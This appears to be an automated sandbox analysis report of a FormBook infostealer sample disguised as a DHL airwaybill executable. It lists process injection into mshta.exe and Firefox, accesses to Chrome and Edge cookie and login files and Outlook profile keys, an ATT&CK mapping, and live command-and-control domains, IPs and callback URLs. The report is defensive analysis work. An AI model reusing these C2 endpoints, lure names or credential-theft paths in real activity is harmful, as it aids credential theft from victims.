            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeNtTerminateThread: Direct from: 0x77377B2EJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeMemory written: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mshta.exeThread register set: target process: 1944Jump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: toceDGfrPzLv.exe, 00000005.00000000.2308564173.0000000001B70000.00000002.00000001.00040000.00000000.sdmp, toceDGfrPzLv.exe, 00000005.00000002.4606162861.0000000001B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1505412 Sample: DHL airwaybill # 6913321715... Startdate: 06/09/2024 Architecture: WINDOWS Score: 100 34 www.030003678.xyz 2->34 36 www.030002721.xyz 2->36 38 23 other IPs or domains 2->38 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 8 other signatures 2->50 10 DHL airwaybill # 6913321715 & BL Draft copy.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 36->48 process4 file5 26 DHL airwaybill # 6... Draft copy.exe.log, ASCII 10->26 dropped 60 Injects a PE file into a foreign processes 10->60 14 DHL airwaybill # 6913321715 & BL Draft copy.exe 10->14         started        signatures6 process7 signatures8 62 Maps a DLL or memory area into another process 14->62 17 toceDGfrPzLv.exe 14->17 injected process9 dnsIp10 28 www.lumixy.online 184.94.212.115, 49749, 49750, 49751 VXCHNGE-NC01US United States 17->28 30 sorriragora.online 162.240.81.18, 49731, 49732, 49733 UNIFIEDLAYER-AS-1US United States 17->30 32 10 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 mshta.exe 13 17->21         started        signatures11 process12 signatures13 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 2 other signatures 21->58 24 firefox.exe 21->24         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL airwaybill # 6913321715 & BL Draft copy.exe61%ReversingLabsWin32.Trojan.Leonem
            DHL airwaybill # 6913321715 & BL Draft copy.exe53%VirustotalBrowse
            DHL airwaybill # 6913321715 & BL Draft copy.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            030002721.xyz1%VirustotalBrowse
            aflaksokna.com0%VirustotalBrowse
            sorriragora.online1%VirustotalBrowse
            www.moveon.cat1%VirustotalBrowse
            kalomor.top7%VirustotalBrowse
            homebizsuccess.blog0%VirustotalBrowse
            thewhitediamond.org1%VirustotalBrowse
            easyanalytics.site1%VirustotalBrowse
            www.1win-moldovia.fun1%VirustotalBrowse
            hm62t.top0%VirustotalBrowse
            www.lumixy.online1%VirustotalBrowse
            www.sorriragora.online1%VirustotalBrowse
            www.homebizsuccess.blog0%VirustotalBrowse
            www.kalomor.top5%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            030003678.xyz1%VirustotalBrowse
            www.hm62t.top2%VirustotalBrowse
            www.aflaksokna.com0%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            www.030003678.xyz2%VirustotalBrowse
            www.318st.com0%VirustotalBrowse
            www.030002721.xyz2%VirustotalBrowse
            www.thewhitediamond.org1%VirustotalBrowse
            www.easyanalytics.site1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.sorriragora.online/wxmz/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.030002721.xyz/i28e/0%Avira URL Cloudsafe
            http://homebizsuccess.blog/xvas/?FR=J9/McS0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.moveon.cat/bb55/0%Avira URL Cloudsafe
            http://www.030003678.xyz/wft4/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.kalomor.top/pf98/100%Avira URL Cloudmalware
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.030002721.xyz/i28e/1%VirustotalBrowse
            http://www.aflaksokna.com/539x/0%Avira URL Cloudsafe
            http://www.homebizsuccess.blog/xvas/0%Avira URL Cloudsafe
            http://www.030003678.xyz/wft4/1%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.sorriragora.online/wxmz/1%VirustotalBrowse
            http://www.henrry.top/uq6q/0%Avira URL Cloudsafe
            http://www.omexai.info/v7i9/?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox0%Avira URL Cloudsafe
            http://www.1win-moldovia.fun/4jz5/0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            http://www.thewhitediamond.org/j05r/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
            http://www.homebizsuccess.blog/xvas/1%VirustotalBrowse
            http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk70%Avira URL Cloudsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%VirustotalBrowse
            http://www.030003678.xyz/wft4/?FR=YTkKwJ8ciWwfk9EboTVmJ8A8z5nQoA6H/11M7sDGKdLnpvCCOp1eIxB3H/IGbE8NJw3dU7UJgJnjxevpFaH+9r0+hPUAaenfY1NUgmg0rJlUJj6QFUl1BdaUrKMG7GtZPuGkbd0=&yXghy=KTox0%Avira URL Cloudsafe
            http://www.030002721.xyz/i28e/?yXghy=KTox&FR=aGpxVX6kGAU+vZyZZfJTCDz7/lPsBFWDos3dY6ZsNYZMPz7BIFF7kPeLI34j35LFjHkoTmJm1HUVC8sGZtVHFfldRMYhCGprZu/MBi0oweQaoGEXOF433+gvsUsQ2wF2VEo07O8=0%Avira URL Cloudsafe
            http://www.easyanalytics.site/d029/?FR=cslaSIgu4SK5hEDj9hUVBt4DVeSxODrxiV3UUYpYDpvuIfyXRHc3+9hbGUkpPVL7vSNSmH7KmnD+rq4wgj4O7IkekeXb2lWER124D4kOUSFtT1194nz+plZg+E7GwvWNw7cZgDY=&yXghy=KTox0%Avira URL Cloudsafe
            https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.moveon.cat/bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox0%Avira URL Cloudsafe
            http://www.henrry.top/uq6q/?FR=9Otm+20UpUikA6x0VD212tqxG3jyIPcWfHFyJTdbxKGeDxDVLjdT/4jyPXypOz+d9yZQrKELvtj6jM/m3RUo26f0zJnEKMWuurbJZWWdFjqlgtWZigu2A/olrWAWySRFQjrMuco=&yXghy=KTox0%Avira URL Cloudsafe
            http://www.sorriragora.online/wxmz/?FR=/3704Vff3w19bJxFjboY/IbcCRxq7QB064cYUEYQjha4p4PIlcXs4dWmoF91tthlGgXSeDBpFM7AphPZ13xvSCd02IeXzvs2jATKINKka4nP9dH8TaBgBhg9ZbFNrO+hXaJ7nrQ=&yXghy=KTox0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.aflaksokna.com/539x/?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%Avira URL Cloudsafe
            http://www.lumixy.online/so9n/0%Avira URL Cloudsafe
            http://www.easyanalytics.site/d029/0%Avira URL Cloudsafe
            http://www.homebizsuccess.blog/xvas/?FR=J9/McS+K1SnUK1dFtfBkoa6WP04kmDmbslaJUnd233GmVE8UX2CUiD/aW92xdqFDEXAl7OPacYUbAp8GfP4HaHix7g4VEpF6t7or8oS92HRG4MEXui+46ttkhOnPdDZiG6qh46k=&yXghy=KTox0%Avira URL Cloudsafe
            http://www.hm62t.top/gd7t/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.hm62t.top/gd7t/?yXghy=KTox&FR=JlAcjlx2Gdg+DXM3i59+nmMFZHdISfOX/D3i1++YLzSS1YHv0m41CgGfSm0I/piMileZ/olvBUKxdIaFHHAoN7eK5KUeh7JInwAPNKMw/FJo5s/UjYShm5Z/UsIKNOFZiX+3bL8=0%Avira URL Cloudsafe
            http://www.moveon.cat0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
            http://www.1win-moldovia.fun/4jz5/?yXghy=KTox&FR=r5SoQQ/DZBXKP6QrNwGfWrJNBN6t0nUZU0GWsfQ0/kE9qy9dgr2+a8OrPCjBDi0TM6SD7wE/mt75vEwxSaGxWB73VkpxOVd4no3A+iHSW7NgpDpMEtZ9JlGQE1ss8/xFDzn1hco=0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            030002721.xyz
            		65.21.196.90
            		truetrueunknown
            aflaksokna.com
            		5.144.130.52
            		truetrueunknown
            www.moveon.cat
            		217.160.0.193
            		truetrueunknown
            sorriragora.online
            		162.240.81.18
            		truetrueunknown
            kalomor.top
            		91.215.85.23
            		truetrueunknown
            homebizsuccess.blog
            		192.185.16.209
            		truetrueunknown
            thewhitediamond.org
            		3.33.130.190
            		truetrueunknown
            easyanalytics.site
            		162.241.226.190
            		truetrueunknown
            hm62t.top
            		154.23.184.240
            		truetrueunknown
            www.henrry.top
            		121.199.37.19
            		truetrue
              		unknown
              www.1win-moldovia.fun
              		188.114.96.3
              		truetrueunknown
              www.lumixy.online
              		184.94.212.115
              		truetrueunknown
              omexai.info
              		3.33.130.190
              		truetrueunknown
              030003678.xyz
              		65.21.196.90
              		truetrueunknown
              www.sorriragora.online
              		unknown
              		unknowntrueunknown
              www.kalomor.top
              		unknown
              		unknowntrueunknown
              www.homebizsuccess.blog
              		unknown
              		unknowntrueunknown
              www.omexai.info
              		unknown
              		unknowntrueunknown
              www.030003678.xyz
              		unknown
              		unknowntrueunknown
              www.hm62t.top
              		unknown
              		unknowntrueunknown
              www.aflaksokna.com
              		unknown
              		unknowntrueunknown
              www.easyanalytics.site
              		unknown
              		unknowntrueunknown
              www.318st.com
              		unknown
              		unknowntrueunknown
              www.thewhitediamond.org
              		unknown
              		unknowntrueunknown
              www.030002721.xyz
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.sorriragora.online/wxmz/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.030002721.xyz/i28e/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.moveon.cat/bb55/true
              • Avira URL Cloud: safe
              		unknown
              http://www.030003678.xyz/wft4/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.kalomor.top/pf98/true
              • Avira URL Cloud: malware
              		unknown
              http://www.aflaksokna.com/539x/true
              • Avira URL Cloud: safe
              		unknown
              http://www.homebizsuccess.blog/xvas/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.henrry.top/uq6q/true
              • Avira URL Cloud: safe
              		unknown
